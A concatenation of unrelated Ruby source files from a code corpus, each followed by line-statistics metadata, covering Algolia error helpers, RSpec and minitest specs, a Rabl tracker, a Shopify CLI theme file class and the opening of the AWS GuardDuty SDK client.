# If the error happens on a _tmp folder, it might mean that the key does
# not have access to the _tmp indices and the error message will reflect
# that.
def self.invalid_credentials_for_tmp_index?(error, _context = {})
details = error_hash(error.message)
index_name_tmp = details['index_name']
if details['message'] != 'Index not allowed with this API key' ||
index_name_tmp !~ /_tmp$/
return false
end
{
'application_id' => Configurator.application_id,
'index_name' => Configurator.index_name,
'index_name_tmp' => index_name_tmp
}
end
# Public: Check if the credentials are working
#
# _context - Not used
#
# Application ID and API key submitted don't match any credentials known
def self.invalid_credentials?(error, _context = {})
details = error_hash(error.message)
if details['message'] != 'Invalid Application-ID or API key'
return false
end
{
'application_id' => details['application_id']
}
end
# Public: Check if the sent records are not too big
#
# context[:records] - list of records to push
#
# Records cannot weight more that 10Kb. If we're getting this error it
# means that one of the records is too big, so we'll try to give
# informations about it so the user can debug it.
def self.record_too_big?(error, context = {})
details = error_hash(error.message)
message = details['message']
return false if message !~ /^Record .* is too big .*/
# Getting the record size
size, = /.*size=(.*) bytes.*/.match(message).captures
size = Filesize.from("#{size} B").pretty
object_id = details['objectID']
# Getting record details
record = Utils.find_by_key(context[:records], :objectID, object_id)
{
'object_id' => object_id,
'object_title' => record[:title],
'object_url' => record[:url],
'object_hint' => record[:content][0..100],
'nodes_to_index' => Configurator.algolia('nodes_to_index'),
'size' => size,
'size_limit' => '10 Kb'
}
end
# Public: Check if one of the index settings is invalid
#
# context[:settings] - The settings passed to update the index
#
# The API will block any call that tries to update a setting value that is
# not available. We'll tell the user which one so they can fix their
# issue.
def self.unknown_settings?(error, context = {})
details = error_hash(error.message)
message = details['message']
return false if message !~ /^Invalid object attributes.*/
# Getting the unknown setting name
regex = /^Invalid object attributes: (.*) near line.*/
setting_name, = regex.match(message).captures
setting_value = context[:settings][setting_name]
{
'setting_name' => setting_name,
'setting_value' => setting_value
}
end
# Public: Check if the index name is invalid
#
# Some characters are forbidden in index names
def self.invalid_index_name?(error, _context = {})
details = error_hash(error.message)
message = details['message']
return false if message !~ /^indexName is not valid.*/
{
'index_name' => Configurator.index_name
}
end
end
end
end
| 31.560886 | 84 | 0.580264 |
5d2842b3b343c3f19090c0f498824a81d569ab24 | 27 | RSpec.describe Apps do
end
| 9 | 22 | 0.814815 |
4a8f25907067430c19c4ed2352c90aed7a87dfb6 | 4,479 | require 'test_helper'
describe Shaf::Formable do
let(:clazz) { Class.new }
let(:subject) do
Class.new do
extend Shaf::Formable
end
end
it 'adds form_for class method' do
assert subject.respond_to? :form_for
end
it 'creates a create form' do
subject.forms_for(clazz) do
title 'Create Form'
action :create
end
assert_instance_of(Shaf::Formable::Form, clazz.create_form)
assert_equal 'Create Form', clazz.create_form.title
assert_equal :'create-form', clazz.create_form.name
assert_equal :create, clazz.create_form.action
end
it 'creates a create form from a nested block' do
subject.form_for(clazz) do
create_form do
title 'Create Form'
end
end
assert_instance_of(Shaf::Formable::Form, clazz.create_form)
assert_equal 'Create Form', clazz.create_form.title
assert_equal :'create-form', clazz.create_form.name
assert_equal :create, clazz.create_form.action
end
it 'adds _form when not provided (legacy)' do
subject.form_for(clazz) do
create do
title 'Create Form'
end
end
assert_instance_of(Shaf::Formable::Form, clazz.create_form)
assert_equal 'Create Form', clazz.create_form.title
assert_equal :'create-form', clazz.create_form.name
assert_equal :create, clazz.create_form.action
end
it 'can override action' do
subject.form_for(clazz) do
create_form do
title 'Some form'
action 'archive'
end
end
assert_instance_of(Shaf::Formable::Form, clazz.create_form)
assert_equal 'Some form', clazz.create_form.title
assert_equal :'archive-form', clazz.create_form.name
assert_equal :archive, clazz.create_form.action
end
it 'does not create a create form without action' do
subject.form_for(clazz) do
title 'Create Form'
end
assert_empty clazz.singleton_methods.grep(/_form/)
end
it 'is possible to set name' do
subject.form_for(clazz) do
title 'Create Form'
action :create
name :"foo-form"
end
assert_instance_of(Shaf::Formable::Form, clazz.create_form)
assert_equal :'foo-form', clazz.create_form.name
end
it 'is possible to set submit' do
subject.form_for(clazz) do
title 'Create Form'
action :create
submit :spara
end
assert_instance_of(Shaf::Formable::Form, clazz.create_form)
assert_equal :spara, clazz.create_form.submit
end
it 'creates an edit form' do
subject.form_for(clazz) do
edit_form do
title 'Edit Form'
action :edit
end
end
assert_instance_of(Shaf::Formable::Form, clazz.edit_form)
assert_equal 'Edit Form', clazz.edit_form.title
assert_equal :'edit-form', clazz.edit_form.name
assert_equal :edit, clazz.edit_form.action
end
it 'creates different create and edit forms' do
subject.forms_for(clazz) do
title 'Common label'
create_form do
method :post
type :foo
end
edit_form do
method :patch
type :bar
end
end
create_form = clazz.create_form
edit_form = clazz.edit_form
assert_equal 'Common label', create_form.title
assert_equal 'Common label', edit_form.title
assert_equal 'POST', create_form.method
assert_equal 'PATCH', edit_form.method
assert_equal :foo, create_form.type
assert_equal :bar, edit_form.type
end
it 'is possible to get the edit form from instances' do
subject.form_for(clazz) do
edit_form do
title 'Edit Form'
instance_accessor
end
end
object = clazz.new
assert_instance_of(Shaf::Formable::Form, object.edit_form)
assert_equal 'Edit Form', object.edit_form.title
assert_equal object, object.edit_form.resource
end
it 'prefills form from an instance' do
clazz.define_method(:foo) { 5 }
subject.form_for(clazz) do
some_form do
instance_accessor prefill: true
field :bar, accessor_name: :foo
end
end
object = clazz.new
assert_equal 5, object.some_form[:bar].value
# Form from class is still empty
assert_nil clazz.some_form[:bar].value
end
it 'returns an empty form from an instance' do
clazz.define_method(:foo) { 5 }
subject.form_for(clazz) do
some_form do
instance_accessor prefill: false
field :foo
end
end
object = clazz.new
assert_nil object.some_form[:foo].value
end
end
| 24.745856 | 63 | 0.679839 |
0301e6fcc72c1fda88e49a60b370b88c8d10aef3 | 714 | require File.expand_path(File.dirname(__FILE__) + '/../../spec_helper')
describe "/acceptance_criteria/edit" do
before :each do
assigns[:project] = mock_model(Project,
:stories => [],
:iterations => [],
:criterion => '')
assigns[:story] = mock_model(Story,
:acceptance_criteria => [],
:content => '')
assigns[:acceptance_criterion] = mock_model(AcceptanceCriterion,
:criterion => '')
render 'acceptance_criteria/edit'
end
it_should_behave_like "a standard view"
end
| 31.043478 | 71 | 0.477591 |
1a97a43ddc3bc1c86427526b31ab6a4e02d3d0ea | 101 | module Alexa
class ApplicationRecord < ActiveRecord::Base
self.abstract_class = true
end
end
| 16.833333 | 46 | 0.762376 |
1d31b237ff6a56507da292fb932dea9c73686b28 | 222 | def bubble_sort(array)
i = 0
while i < array.size - 1
j = i + 1
while j < array.size
array[i], array[j] = array[j], array[i] if array[i] > array[j]
j = j + 1
end
i = i + 1
end
array
end
| 17.076923 | 68 | 0.509009 |
e2cf242f901a4a5b74731aa5838a0261b7f00aa2 | 658 | # encoding: utf-8
# This file is distributed under New Relic's license terms.
# See https://github.com/newrelic/newrelic-ruby-agent/blob/main/LICENSE for complete details.
# frozen_string_literal: true
module NewRelic
module Agent
# This class is used for instrumentations that have exceptions or error classes
# not derived from Ruby's usual Exception or StandardError or in situations
# where we do not have such Exception object to work with.
class NoticibleError
attr_reader :class_name, :message
def initialize class_name, message
@class_name = class_name
@message = message
end
end
end
end
| 28.608696 | 93 | 0.729483 |
8775a92f90d529097155f2ecd204ba50852e521c | 6,724 | require "spec_helper"
require "membrane"
require "json_message"
require "cf_message_bus/mock_message_bus"
module VCAP::CloudController
describe LegacyBulk do
let(:mbus) { CfMessageBus::MockMessageBus.new({}) }
before do
@bulk_user = "bulk_user"
@bulk_password = "bulk_password"
end
describe ".register_subscription" do
it "should be able to discover credentials through message bus" do
LegacyBulk.configure(TestConfig.config, mbus)
expect(mbus).to receive(:subscribe)
.with("cloudcontroller.bulk.credentials.ng")
.and_yield("xxx", "inbox")
expect(mbus).to receive(:publish).with("inbox", anything) do |_, msg|
expect(msg).to eq({
"user" => @bulk_user,
"password" => @bulk_password,
})
end
LegacyBulk.register_subscription
end
end
describe "GET", "/bulk/apps" do
before { 5.times { AppFactory.make } }
it "requires authentication" do
get "/bulk/apps"
expect(last_response.status).to eq(401)
authorize "bar", "foo"
get "/bulk/apps"
expect(last_response.status).to eq(401)
end
describe "with authentication" do
before do
authorize @bulk_user, @bulk_password
end
it "requires a token in query string" do
get "/bulk/apps"
expect(last_response.status).to eq(400)
end
it "returns nil bulk_token for the initial request" do
get "/bulk/apps"
expect(decoded_response["bulk_token"]).to be_nil
end
it "returns a populated bulk_token for the initial request (which has an empty bulk token)" do
get "/bulk/apps", {
"batch_size" => 20,
"bulk_token" => "{}",
}
expect(decoded_response["bulk_token"]).not_to be_nil
end
it "returns results in the response body" do
get "/bulk/apps", {
"batch_size" => 20,
"bulk_token" => "{\"id\":20}",
}
expect(last_response.status).to eq(200)
expect(decoded_response["results"]).not_to be_nil
end
it "returns results that are valid json" do
get "/bulk/apps", {
"batch_size" => 100,
"bulk_token" => "{\"id\":0}",
}
expect(last_response.status).to eq(200)
decoded_response["results"].each { |key,value|
expect(value).to be_kind_of Hash
expect(value["id"]).not_to be_nil
expect(value["version"]).not_to be_nil
}
end
it "respects the batch_size parameter" do
[3,5].each { |size|
get "/bulk/apps", {
"batch_size" => size,
"bulk_token" => "{\"id\":0}",
}
expect(decoded_response["results"].size).to eq(size)
}
end
it "returns non-intersecting results when token is supplied" do
get "/bulk/apps", {
"batch_size" => 2,
"bulk_token" => "{\"id\":0}",
}
saved_results = decoded_response["results"].dup
expect(saved_results.size).to eq(2)
get "/bulk/apps", {
"batch_size" => 2,
"bulk_token" => MultiJson.dump(decoded_response["bulk_token"]),
}
new_results = decoded_response["results"].dup
expect(new_results.size).to eq(2)
saved_results.each do |saved_result|
expect(new_results).not_to include(saved_result)
end
end
it "should eventually return entire collection, batch after batch" do
apps = {}
total_size = App.count
token = "{}"
while apps.size < total_size do
get "/bulk/apps", {
"batch_size" => 2,
"bulk_token" => MultiJson.dump(token),
}
expect(last_response.status).to eq(200)
token = decoded_response["bulk_token"]
apps.merge!(decoded_response["results"])
end
expect(apps.size).to eq(total_size)
get "/bulk/apps", {
"batch_size" => 2,
"bulk_token" => MultiJson.dump(token),
}
expect(decoded_response["results"].size).to eq(0)
end
context "when diego_running is set to disabled" do
before do
allow(Config.config).to receive(:[]).with(anything).and_call_original
allow(Config.config).to receive(:[]).with(:diego).and_return(
staging: 'optional',
running: 'disabled',
)
LegacyBulk.configure(Config.config, mbus)
end
it "includes diego apps" do
environment = {
"CF_DIEGO_RUN_BETA" => "true"
}
app = AppFactory.make(environment_json: environment)
get "/bulk/apps", {
"batch_size" => 20,
"bulk_token" => "{}",
}
expect(last_response.status).to eq(200)
expect(decoded_response["results"].size).to eq(6)
expect(decoded_response["results"]).to include(app.guid)
end
end
context "when diego_running is set to optional" do
before do
allow(Config.config).to receive(:[]).with(anything).and_call_original
allow(Config.config).to receive(:[]).with(:diego).and_return(
staging: 'optional',
running: 'optional',
)
LegacyBulk.configure(Config.config, mbus)
end
it "does not include diego apps" do
environment = {
"CF_DIEGO_RUN_BETA" => "true"
}
app = AppFactory.make(environment_json: environment)
get "/bulk/apps", {
"batch_size" => 20,
"bulk_token" => "{}",
}
expect(last_response.status).to eq(200)
expect(decoded_response["results"]).to_not include(app.guid)
expect(decoded_response["results"].size).to eq(5)
end
end
end
end
describe "GET", "/bulk/counts" do
it "requires authentication" do
get "/bulk/counts", {"model" => "user"}
expect(last_response.status).to eq(401)
end
it "returns the number of users" do
4.times { User.make }
authorize @bulk_user, @bulk_password
get "/bulk/counts", {"model" => "user"}
expect(decoded_response["counts"]).to include("user" => kind_of(Integer))
expect(decoded_response["counts"]["user"]).to eq(User.count)
end
end
end
end
| 31.568075 | 102 | 0.542385 |
e9f9767eb45f2487713a9e1eea39deb39621501b | 1,142 | require 'spec_helper'
RSpec.describe HackingProgram do
let(:passphrase) { 'welcome' }
let(:record) do
DataSources::Record.new({
source: 'foo',
passphrase: passphrase,
start_node: 'bar',
end_node: 'baz',
start_time: Time.now.to_s,
end_time: Time.now.to_s,
})
end
let(:records_sets) { [DataSources::RecordsSet.new([record])] }
let(:logger) { double('Logger', error: true) }
let(:file_content) { File.read("spec/fixtures/loopholes.zip") }
let(:answer) { File.read("spec/fixtures/answer.json") }
before do
stub_request(:get, /#{Terminal::DOMAIN}.*/).
to_return(:status => 200, :body => file_content)
stub_request(:post, /#{Terminal::DOMAIN}.*/).
to_return(status: 503, body: answer)
end
subject do
described_class.new(logger: logger).tap do |o|
o.passphrase = passphrase
o.records_sets = records_sets
o.terminal = Terminal
end
end
describe '#hack' do
it 'imports data' do
expect(logger).to receive(:error).exactly(4).times
expect(logger).to receive(:info).with("STATUS 503")
subject.hack
end
end
end
| 26.55814 | 65 | 0.636602 |
ffe5e42ae36d38d5a4df2e023af8049582426271 | 1,088 | module ApplicationHelper
# Helper function for including CSS in the head
def css_for_head filename, type=:page
@head_css_cache = {} if @head_css_cache.nil?
content_symbol = type == :page ? :page_assets : :layout_assets
content_for content_symbol do
stylesheet_link_tag("/css/" + filename)
end if @head_css_cache[filename].nil?
@head_css_cache[filename] = true
end
# Helper function for including JS in the head
def js_for_head filename, type=:page
@head_js_cache = {} if @head_js_cache.nil?
content_symbol = type == :page ? :page_assets : :layout_assets
content_for content_symbol do
javascript_include_tag("/js/" + filename)
end if @head_js_cache[filename].nil?
@head_js_cache[filename] = true
end
# Helper function for including JS in the body
def js_for_body filename, type=:page
@body_js_cache = {} if @body_js_cache.nil?
return unless @body_js_cache[filename].nil?
@body_js_cache[filename] = true
javascript_include_tag("/js/" + filename)
end
end
| 27.2 | 66 | 0.683824 |
798dd8661417e1a18cdd850f4a6b48d7d3875209 | 1,325 | module Rabl
# DependencyTracker for ActionView to support cache digest
class Tracker
# Matches:
# extends "categories/show"
EXTENDS_DEPENDENCY = /
extends\s* # extends, followed by optional whitespace
\(? # start an optional parenthesis for the extends call
\s*["']([a-z_\/\.]+) # the template name itself
/x
# Matches:
# partial "categories/show"
PARTIAL_DEPENDENCY = /
partial\s* # partial, followed by optional whitespace
\(? # start an optional parenthesis for the partial call
\s*["']([a-z_\/\.]+) # the template name itself
/x
def self.call(name, template)
new(name, template).dependencies
end
def initialize(name, template)
@name, @template = name, template
end
def dependencies
(extends_dependencies + partial_dependencies).uniq
end
attr_reader :name, :template
private :name, :template
private
def source
template.source
end
def directory
name.split("/")[0..-2].join("/")
end
def extends_dependencies
source.scan(EXTENDS_DEPENDENCY).flatten
end
def partial_dependencies
source.scan(PARTIAL_DEPENDENCY).flatten
end
end
end
| 24.537037 | 82 | 0.594717 |
bfbe8acab1f30000bb375ff6fe7d4338d7229e7d | 197 | # frozen_string_literal: true
class AddPidToExecutionsAndRuns < ActiveRecord::Migration[5.2]
def change
add_column :executions, :pid, :integer
add_column :runs, :pid, :integer
end
end
| 21.888889 | 62 | 0.746193 |
e925a8b89a0d233e12d9f470f395b1f23f0214d5 | 205 | # frozen_string_literal: true
module TodoLists
class Create
include RailsEventSourcing::Command
attributes :name
def build_event
TodoLists::Created.new(name: name)
end
end
end
| 14.642857 | 40 | 0.717073 |
6ad2d83dd7c1dde403f26874519e601d326c3d4d | 3,085 | # frozen_string_literal: true
require_relative "mime_type"
module ShopifyCLI
module Theme
class File < Struct.new(:path)
attr_accessor :remote_checksum
def initialize(path, root)
super(Pathname.new(path))
# Path may be relative or absolute depending on the source.
# By converting both the path and the root to absolute paths, we
# can safely fetch a relative path.
@relative_path = self.path.expand_path.relative_path_from(root.expand_path)
end
def read
if text?
path.read(universal_newline: true)
else
path.read(mode: "rb")
end
end
def write(content)
path.parent.mkpath unless path.parent.directory?
if text?
path.write(content, universal_newline: true)
else
path.write(content, 0, mode: "wb")
end
end
def delete
path.delete
end
def exist?
path.exist?
end
def mime_type
@mime_type ||= MimeType.by_filename(@relative_path)
end
def text?
mime_type.text?
end
def liquid?
path.extname == ".liquid"
end
def liquid_css?
relative_path.end_with?(".css.liquid")
end
def json?
path.extname == ".json"
end
def template?
relative_path.start_with?("templates/")
end
def checksum
content = read
if mime_type.json?
# Normalize JSON to match backend
begin
content = normalize_json(content)
rescue JSON::JSONError
# Fallback to using the raw content
end
end
Digest::MD5.hexdigest(content)
end
# Make it possible to check whether a given File is within a list of Files with `include?`,
# some of which may be relative paths while others are absolute paths.
def ==(other)
relative_path == other.relative_path
end
def name(*args)
::File.basename(path, *args)
end
def absolute_path
path.realpath.to_s
end
def relative_path
@relative_path.to_s
end
private
def normalize_json(content)
parsed = JSON.parse(content)
if template?
JsonTemplateNormalizer.new.visit_document(parsed)
end
normalized = JSON.generate(parsed)
# Backend escapes forward slashes
normalized.gsub!(/\//, "\\/")
normalized
end
class JsonTemplateNormalizer
def visit_document(value)
visit_hash(value["sections"])
end
def visit_hash(hash)
return unless hash.is_a?(Hash)
hash.each do |_, value|
visit_value(value)
end
end
def visit_value(value)
# Reinsert settings to force the same ordering as in the backend
settings = value.delete("settings") || {}
value["settings"] = settings
visit_hash(value["blocks"])
end
end
end
end
end
| 22.683824 | 97 | 0.576337 |
212c8f8bf33ca5310862c32caf5944d1b9671f5b | 330 | module Cryptoexchange::Exchanges
module Btcexa
class Market < Cryptoexchange::Models::Market
NAME = 'btcexa'
API_URL = 'https://api.btcexa.com/api'
def self.trade_page_url(args={})
"https://btcexa.com/exchange?tag=#{args[:target]}&name=#{args[:base]}_#{args[:target]}"
end
end
end
end
| 25.384615 | 95 | 0.636364 |
1a7b32e82cb51ec36407224875420c9eb370225e | 858 | require 'spec_helper'
RSpec.describe 'Inheritance relation hierarchy' do
include_context 'container'
before do
module Test
class Users < ROM::Relation[:memory]
schema(:users) { }
def by_email(email)
restrict(email: email)
end
end
class OtherUsers < Users
schema(:other_users) { }
end
end
configuration.register_relation(Test::Users, Test::OtherUsers)
end
it 'registers parent and descendant relations' do
users = container.relations[:users]
other_users = container.relations[:other_users]
expect(users).to be_instance_of(Test::Users)
expect(other_users).to be_instance_of(Test::OtherUsers)
jane = { name: 'Jane', email: '[email protected]' }
other_users.insert(jane)
expect(other_users.by_email('[email protected]').one).to eql(jane)
end
end
| 22.578947 | 66 | 0.667832 |
4aea276db968b35aa3252bf8f60c81cf2edc6675 | 2,361 | class Entry < ApplicationRecord
belongs_to :category
belongs_to :user
belongs_to :request, optional: true
has_many :thoughts
has_many :entries_cards
has_many :cards, through: :entries_cards
validates :interpretation_1, :interpretation_2, :interpretation_3, presence: true, if: -> { request_id.present? }
validates_presence_of :category, :message => "A spread must be selected from the menu or created with three custom questions"
validates_presence_of :card_ids, presence: true, if: -> { request_id.present? }, :message => "- All three cards must be selected"
validates_length_of :card_ids, maximum: 3
validate :card_id_uniqueness
scope :this_month, -> { where(created_at: Time.now.beginning_of_month..Time.now.end_of_month) }
scope :major_cards, -> { joins(:cards).where("cards.designation = ?", "Major") }
scope :minor_cards, -> { joins(:cards).where("cards.designation = ?", "Minor") }
scope :court_cards, -> { joins(:cards).where("cards.court = ?", true) }
scope :cup_cards, -> { joins(:cards).where("cards.suit = ?", "Cups") }
scope :pentacle_cards, -> { joins(:cards).where("cards.suit = ?", "Pentacles") }
scope :sword_cards, -> { joins(:cards).where("cards.suit = ?", "Swords") }
scope :wand_cards, -> { joins(:cards).where("cards.suit = ?", "Wands") }
def card_id_uniqueness
errors.add(:card, "cannot be selected twice from the same deck") unless card_ids == card_ids.uniq
end
def add_randomized_card
until !self.cards.include?(random_card = Card.randomize) do
random_card = Card.randomize
end
self.cards << random_card
end
def category_attributes=(category_attributes)
if category_attributes[:question_1].present? && category_attributes[:question_2].present? && category_attributes[:question_3].present?
self.build_category(category_attributes)
end
end
def self.filter_by_spread(category_name)
category_name.present? ? self.joins(:category).where(categories: {name: category_name} ) : self.all
end
def self.filter_by_card(card_id)
card_id.present? ? self.joins(:cards).where("cards.id = ?", card_id) : self.all
end
def self.total_cards
self.all.size * 3
end
def display_date_created
self.created_at.strftime("%B %e, %Y at %l:%M%p")
end
def display_date_created_short
self.created_at.strftime("%B %e, %Y")
end
end
| 40.016949 | 138 | 0.707327 |
217fa8dcef748fed41ef01e5d6b643e82625fe6b | 2,311 | # encoding: utf-8
require 'github_api/request/oauth2'
require 'github_api/request/basic_auth'
require 'github_api/request/jsonize'
require 'github_api/connection'
module Github
# A class responsible for dispatching http requests
class Request
include Connection
HTTP_METHODS = [:get, :head, :post, :put, :delete, :patch]
METHODS_WITH_BODIES = [:post, :put, :patch]
# Return http verb
#
# @return [Symbol]
attr_reader :action
# Return url
#
# @return [String]
attr_accessor :path
# Return api this request is associated with
#
# @return [Github::API]
attr_reader :api
# Create a new Request
#
# @return [Github::Request]
#
# @api public
def initialize(action, path, api)
@action = action
@path = path
@api = api
end
# Performs a request
#
# @param [Symbol] method - The Symbol the HTTP verb
# @param [String] path - String relative URL to access
# @param [ParamsHash] params - ParamsHash to configure the request API
#
# @return [Github::ResponseWrapper]
#
# @api private
def call(current_options, params)
unless HTTP_METHODS.include?(action)
raise ArgumentError, "unknown http method: #{method}"
end
puts "EXECUTED: #{action} - #{path} with PARAMS: #{params}" if ENV['DEBUG']
request_options = params.options
connection_options = current_options.merge(request_options)
conn = connection(api, connection_options)
if conn.path_prefix != '/' && self.path.index(conn.path_prefix) != 0
self.path = (conn.path_prefix + self.path).gsub(/\/(\/)*/, '/')
end
response = conn.send(action) do |request|
case action.to_sym
when *(HTTP_METHODS - METHODS_WITH_BODIES)
request.body = params.data if params.has_key?('data')
if params.has_key?('encoder')
request.params.params_encoder(params.encoder)
end
request.url(self.path, params.to_hash)
when *METHODS_WITH_BODIES
request.url(self.path, connection_options[:query] || {})
request.body = params.data unless params.empty?
end
end
ResponseWrapper.new(response, api)
end
end # Request
end # Github
| 27.188235 | 81 | 0.62527 |
e94e3a3879567e9264eda8ef019315859a2704ec | 125,406 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/http_checksum.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/rest_json.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:guardduty)
module Aws::GuardDuty
# An API client for GuardDuty. To construct a client, you need to configure a `:region` and `:credentials`.
#
# client = Aws::GuardDuty::Client.new(
# region: region_name,
# credentials: credentials,
# # ...
# )
#
# For details on configuring region and credentials see
# the [developer guide](/sdk-for-ruby/v3/developer-guide/setup-config.html).
#
# See {#initialize} for a full list of supported configuration options.
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :guardduty
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::HttpChecksum)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::RestJson)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::SharedCredentials` - Used for loading credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2 IMDS instance profile - When used by default, the timeouts are
# very aggressive. Construct and pass an instance of
# `Aws::InstanceProfileCredentails` to enable retries and extended
# timeouts.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is searched for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :adaptive_retry_wait_to_fill (true)
# Used only in `adaptive` retry mode. When true, the request will sleep
# until there is sufficent client side capacity to retry the request.
# When false, the request will raise a `RetryCapacityNotAvailableError` and will
# not retry instead of sleeping.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [String] :client_side_monitoring_host ("127.0.0.1")
# Allows you to specify the DNS hostname or IPv4 or IPv6 address that the client
# side monitoring agent is running on, where client metrics will be published via UDP.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :correct_clock_skew (true)
# Used only in `standard` and adaptive retry modes. Specifies whether to apply
# a clock skew correction and retry requests with skewed client clocks.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test or custom endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [Integer] :max_attempts (3)
# An integer representing the maximum number attempts that will be made for
# a single request, including the initial attempt. For example,
# setting this value to 5 will result in a request being retried up to
# 4 times. Used in `standard` and `adaptive` retry modes.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Proc] :retry_backoff
# A proc or lambda used for backoff. Defaults to 2**retries * retry_base_delay.
# This option is only used in the `legacy` retry mode.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function. This option
# is only used in the `legacy` retry mode.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function.
# Some predefined functions can be referenced by name - :none, :equal, :full,
# otherwise a Proc that takes and returns a number. This option is only used
# in the `legacy` retry mode.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors, auth errors,
# endpoint discovery, and errors from expired credentials.
# This option is only used in the `legacy` retry mode.
#
# @option options [Integer] :retry_max_delay (0)
